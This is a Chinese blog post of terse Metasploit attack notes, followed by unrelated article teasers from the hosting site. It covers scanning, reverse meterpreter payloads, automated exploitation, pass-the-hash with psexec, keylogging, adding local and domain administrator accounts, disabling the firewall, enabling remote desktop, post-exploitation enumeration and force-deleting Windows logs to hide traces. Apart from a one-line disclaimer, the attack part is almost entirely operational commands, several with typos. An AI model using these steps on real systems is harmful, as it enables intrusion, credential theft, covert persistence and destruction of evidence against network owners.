MSF经典attack示范

news2024/9/22 19:30:24

免责声明:本文仅做分享... 

目录

Nessus官网

指定攻击

自动在线攻击

nmap扫

查看扫到的服务

查看主机

离线攻击

 Msfvenom

本地快速传递文件的方法-->py

哈希传递攻击

提权

后渗透阶段

1-收集操作系统和版本信息

2-主机名称&环境变量

3-用户账户信息

4-远程端口

5-网络信息

6-应用程序和服务

7-注册表

8-系统权限

9-清理痕迹:


Nessus官网

可以联动MSF.

Tenable 风险暴露管理解决方案指南 | Tenable® (tenablecloud.cn)

试用7day 


指定攻击

手工--命令

创建
--高级扫描
--设置名字,目标--开扫(简单的扫描)

search
use exploit/
show payloads

set windows/meterpreter/
>>tab键

bind一般不过
reverse

show options
set ........
set target ...(不填会默认帮你选)


exploit
meterpreter > sysinfo     //看系统的信息


ctrl+C
background(挂起来)
sessions  //看到拿下的所有会话
sessions ...

sessions -h

session -k id  //踢掉会话

 

自动在线攻击

--先连接数据库欧...

自动化

nmap扫

查看扫到的服务

查看主机


db_autpwn.rb

/usr/share/Metasploit-Framework/plugins/

load xxx

自动干...(时间长) 

db_autpwn -p -t -e

离线攻击

马子上

 Msfvenom

Msfvenom是净荷生成和编码的组合,它在2015年6月8日取代了MsfPayload和MsfEncode这两个工具。

The advantages of msfvenom are(优点):

One single tool (一个单一的集成工具)

Standardizedcommandlineoptions(命令行选项标准化)

Increased speed(优化速度)

msfvenom -l payloads
msfvenom --help-formats
msfvenom -l encoders

马子自己上线吧 


本地快速传递文件的方法-->py

在某个目录下运行: 

python -m SimpleHTTPServer <port>


哈希传递攻击

meterpreter>run hashdump

use exploit/windows/smb/psexec
set 
set smbuser <用户名>
set smbpass <hash值>
exploit


拿下后--->
sysinfo
getuid
ps   --找管理员用的进程
migrate <进程号>    --迁移权限
getuid   

keyscan_start

run get_local_subnets   //网络

添加路由,下一跳的流量给...

run getgui -e    //打开win2008远程桌面


shell
net user xxx xxx /add
net user xxx xxx /add /domain

net localgroup administrators xxx
net localgroup administrators xxx /doamin
net group "域" xxx /add /domain


netsh firewall set opmode enable
netsh firewall set opmode disable


rdesktop <IP>

提权

脚本

MSF全自动:

http://t.csdnimg.cn/7qKYy

CS半自动

域控提权:  CVE + 票据

klist purge
klist

 


后渗透阶段

--得到点东西

(手工/工具)

命令

脚本

1-收集操作系统和版本信息

systeminfo
systeminfo | findstr /B /C:"OS <Name>" 

2-主机名称&环境变量

hostname

set

3-用户账户信息

net user    #查看本地所有用户账户
net localgroup      查看本地所有用户组
netuser/domain      查看域用户账户
net group/domain    查看域用户组
net group "Domain Admins"/domain     查看特定域组中的用户

4-远程端口

netstat -ano | more        查看开放端口与连接

5-网络信息

ipconfig /all        查看网络配置
route print I        查看路由表
arp -a                查看ARP缓存

6-应用程序和服务

wmic product list brief

查看当前已安装的应用程序

7-注册表

直接读取密码?!

Password – Penetration Testing Lab (pentestlab.blog)


8-系统权限

cacls 
cacls c:\

 

wmic > process where name="进程名称.exe" list full
# 显示进程的详细信息

 


9-清理痕迹:

del %WINDIR%*.log /a/s/q/f
# 强制静默删除只读文件

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2036957.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Stable Diffusion绘画 | ControlNet应用-NormalMap(法线贴图)

NormalMap(法线贴图)&#xff0c;指的是一张只有红绿蓝RGB颜色的图片&#xff0c;通过指定的发法线算法&#xff0c;用RGB颜色相互混合搭配来表示物体的凹凸情况&#xff0c;常用于3D贴图模型使用。 整体配置如下&#xff1a; ControlNet 的法线控制可以把任何的图片转化为法线…

Java Web —— 第四天(HTTP协议,Tomcat)

HTTP-概述 概念:Hyper Text Transfer Protocol&#xff0c;超文本传输协议&#xff0c;规定了浏览器和服务器之间数据传输的规则 特点: 1. 基于TCP协议:面向连接&#xff0c;安全 2.基于请求-响应模型的:一次请求对应一次响应 3. HTTP协议是无状态的协议: 对于事务处理没有…

书生浦语大模型全链路开源开放体系学习

书生浦语大模型的开源体系经过一年努力&#xff0c;已实现从数据收集到模型部署的全链路打通。课程介绍了书生浦语的最新进展&#xff0c;包括7B和20B模型的开源及其性能提升。新版本模型在推理能力和上下文处理上表现优异&#xff0c;支持超长上下文和复杂任务解决。开源工具涵…

Java并发类API--Executor与ThreadPoolExecutor

在 Java 中&#xff0c;Executor 和 ThreadPoolExecutor 是用于管理线程和执行任务的工具&#xff0c;帮助开发者更好地控制多线程环境。下面是它们的使用和区别。 1.Executor 简介 Executor 是一个接口&#xff0c;用来创建线程池&#xff0c;它定义了一个 execute(Runnable c…

05 内部类API异常

1.内部类 1.1形参和返回值 1. 类名作为形参和返回值 方法的形参是类名,需要该类的对象 方法的返回值为类名,则返回该类的对象 2.抽象类名作为形参和返回值 方法的形参是抽象类名,需要该类的子类对象 方法的返回值是抽象类名,需要返回是该类的子类对象 3.接口名作为形参和返回值…

打印机维护好帮手 | 闪克打印机修复助手 v2.23.0.0

闪克打印机修复助手是一款专业的打印机修复软件&#xff0c;专为解决打印机相关问题而设计&#xff0c;能够帮助用户轻松识别和处理打印机设备的问题&#xff0c;从而提升工作效率。闪克打印机修复助手集成了错误修复、打印机驱动安装和综合修复三大功能。 它能够安全、快速、高…

C盘磁盘空间不足:VirtualBox的锅

文章目录 一&#xff0c;数据迁移二&#xff0c;修改默认配置三&#xff0c;在VirtualBox上删除原来的虚拟机四&#xff0c;在新的虚拟机目录下五&#xff0c;删除C盘上的虚拟机文件虚拟机消耗磁盘分析 开始在自己的windows电脑上使用Vitualbox虚拟机之后&#xff0c;发现C盘常…

【走迷宫】

题目 DFS代码 #include<bits/stdc.h> using namespace std; const int N 110; int matrix[N][N]; int n, m; int dx[4] {-1, 0, 1, 0}, dy[4] {0, 1, 0, -1}; int dis[N][N]; void dfs(int x, int y, int cnt) {if(cnt > dis[n-1][m-1]) return;if(x n-1 &&a…

Vue2.0 项目实战篇\部署篇

Vue2.0 项目实战篇\部署篇&#x1f4dc; 本篇文章学习记录于&#xff1a; bilibili-黑马程序♞ 104-139集 》》&#x1f3af;目标&#xff1a;冲击前后端全栈&#x1f525;&#xff0c;分享一下学过程&#xff1a; Java.慈祥的博客——个人前端技术栈blog记录&#xff1a;、感…

list使用及底层模拟实现

目录 一.list的使用 排序sort 去重unique remove按值删除 remove_if splice merge合并 二.模拟实现 1.成员变量及节点的实现 2.普通迭代器 成员变量 解引用operator* operator-> 前置和前置-- 后置和后置-- 等于与不等于重载 begin()迭代器 end()迭代器 3.co…

【论文阅读】YOLOv10: Real-Time End-to-End Object Detection

题目&#xff1a;YOLOv10: Real-Time End-to-End Object Detection 作者&#xff1a;Ao Wang Hui Chen∗ Lihao Liu Kai Chen Zijia Lin Jungong Han Guiguang Ding∗ 清华大学的 motivation: 作者觉得YOLO系列的NMS和某些结构非常的耗时&#xff0c;提出NMS-free和一些列高效…

AI大模型赋能游戏:更智能、更个性化的NPC

参考论文&#xff1a;https://arxiv.org/abs/2403.10249 在传统游戏中&#xff0c;NPC&#xff08;非玩家角色&#xff09;的行为往往是预先设定好的&#xff0c;缺乏灵活性和变化性。然而&#xff0c;基于大模型的NPC可以利用其强大的推理和学习能力&#xff0c;实时生成对话…

使用 JUnit 5 进行 Java 单元测试:最佳实践和技术说明

掌握 Java 单元测试&#xff1a;深入了解工具、最佳实践和技术&#xff0c;以确保代码的稳健性。增强软件可靠性并完美交付&#xff01; 想要提升 Java 开发工作量&#xff1f;本指南探索 Java 测试领域&#xff0c;涵盖基础概念和高级技术。您将了解测试驱动开发 (TDD) 的重要…

Wireshark分析工具

简单用例 首先打开软件,左上角点文件,选中要分析的文件列表。 导入用tcpdump抓的包后进行分析,这里要输入过滤条件,对网络包进行一定的过滤处理。(这里172网段是阿里云的地址,用自己写的python2脚本对阿里云进行压测。) 这里输入过滤条件 tcp.port == 80 ,语法含义是…

快速把文件名统计到excel表的方法

文件名统计到EXCEL表&#xff0c;这似乎很多人都没听说过&#xff0c;因为它与EXCEL表格不沾边&#xff0c;那么这个需求如何实现&#xff0c;用到什么方法&#xff0c;今天给大家介绍一个比较实用的方法&#xff0c;它可以把文件名或文件夹的名快速提取并统计到EXCEL表格上去。…

C++ | Leetcode C++题解之第334题递增的三元子序列

题目&#xff1a; 题解&#xff1a; class Solution { public:bool increasingTriplet(vector<int>& nums) {int n nums.size();if (n < 3) {return false;}int first nums[0], second INT_MAX;for (int i 1; i < n; i) {int num nums[i];if (num > s…

Unity 资源分享 之 恐龙Ceratosaurus资源模型携 82 个动画来袭

Unity 资源分享 之 恐龙Ceratosaurus资源模型携 82 个动画来袭 一、前言二&#xff0c;资源包内容三、免费获取资源包 一、前言 亲爱的 Unity 开发者和爱好者们&#xff0c;大家好&#xff01;今天要为大家分享一份超级酷炫的 Unity 资源——恐龙资源模型&#xff0c;而且它还…

HBase snapshot+replication 测试

一、背景 画像标签服务&#xff08;CDP&#xff09;是核心服务&#xff0c;被公司其他系统如现金、电商、风控等核心业务调用。异常的话&#xff0c;影响范围大。 二、目标 存量数据测试通过 snapshot 迁移。增量数据测试通过 replication 同步。 三、测试 方案二测试&#x…

LabVIEW电流互感器测试系统

开发了基于LabVIEW的光电式电流互感器测试系统的开发过程。通过系统设计、硬件选型及软件实现的详细描述&#xff0c;展示了该系统如何有效地进行电流互感器的性能测试。 项目背景 电流互感器是电力系统中不可或缺的一部分&#xff0c;用于监测和控制电流流动&#xff0c;确保…

Ubuntu基础使用-适合新手的讲解

目录 一、基础操作 1. 终端重要热键 2. 基础命令 3. 通配符 二、文件与目录 1. 2.等价 3.帮助指令 4.当前路径 更改路径 5.创建与删除文件夹 6.创建与删除文件 7.重定向&#xff08;写入&#xff0c;追加写入&#xff09; 8.查看文件内容 9.wc指令 10.复制&…